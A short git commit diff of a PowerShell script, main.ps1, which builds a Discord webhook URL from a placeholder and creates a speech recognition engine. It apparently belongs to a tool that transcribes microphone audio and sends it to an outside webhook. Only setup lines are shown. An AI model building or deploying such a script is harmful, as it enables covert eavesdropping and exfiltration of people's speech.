Update main.ps1

This commit is contained in:
egieb
2025-06-19 16:56:25 +00:00
committed by GitHub
parent ea898568c2
commit d46080166c

View File

@@ -8,7 +8,10 @@ SETUP
#>
$dc = 'WEBHOOK_HERE' # can be shortened
$dc = "$dc"
if ($dc.Length -lt 120){
$dc = ("https://discord.com/api/webhooks/" + "$dc")
}
Add-Type -AssemblyName System.Speech
$speech = New-Object System.Speech.Recognition.SpeechRecognitionEngine